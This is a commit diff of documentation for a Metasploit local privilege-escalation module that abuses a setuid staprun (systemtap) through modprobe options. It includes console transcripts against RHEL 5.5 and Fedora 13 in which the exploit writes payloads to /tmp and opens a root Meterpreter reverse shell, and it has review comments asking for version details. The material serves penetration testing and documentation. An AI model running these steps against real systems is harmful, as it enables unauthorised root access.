Land #11759 docs update for systemtap

master
h00die 2019-04-19 13:42:49 -04:00
commit cf9bda08ae
No known key found for this signature in database
GPG Key ID: C5A9D25D1457C971
1 changed files with 38 additions and 6 deletions


@ -31,10 +31,6 @@
## Options
**SESSION**
Which session to use, which can be viewed with `sessions`
**STAPRUN_PATH**
Path to staprun executable (default: `/usr/bin/staprun`)
@ -46,15 +42,17 @@
## Scenarios
### Red Hat Enterprise Linux 5.5 (x64)
```
msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/staprun is executable
[+] /usr/bin/staprun is setuid
[*] Writing '/tmp/.rX9IoM53YEb92' (207 bytes) ...
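Review bot: The scenario heading "Red Hat Enterprise Linux 5.5 (x64)" names only the distribution and architecture, so a reader cannot tell which systemtap package the run was made against. The transcript confirms the preconditions the module checks ("/usr/bin/staprun is executable", "/usr/bin/staprun is setuid") but not the installed version. Please add the systemtap package version used for this test, either in the heading or on a line just before the code block, so the result can be reproduced and so administrators can compare it with what they have deployed.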
@ -80,3 +78,37 @@
meterpreter >
```
### Fedora 13 (x86)
```
msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[+] /usr/bin/staprun is executable
[+] /usr/bin/staprun is setuid
[*] Writing '/tmp/.otCyN6cAa7aUo0v' (207 bytes) ...
[*] Writing '/tmp/.otCyN6cAa7aUo0v.conf' (23 bytes) ...
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.138
ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
Retrying, after attempted removal of module l0rDp93O8f (rc -1)
ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.138:33541) at 2019-04-19 07:26:46 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer : fedora13.localdomain
OS : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
Architecture : i686
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter >
```
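Review bot: The staprun ERROR lines in the new Fedora 13 transcript ("Unable to canonicalize path ... No such file or directory", followed by "Retrying, after attempted removal of module ...") appear without any explanation, and a reader will take them for a failed run even though the session opens with uid=0 immediately afterwards. If this output is expected on this target, say so in a sentence before the code block. The transcript also shows two files written under /tmp (the payload and its ".conf" companion) but nothing about their removal; please state whether the module cleans them up, and record the systemtap package version tested here as well.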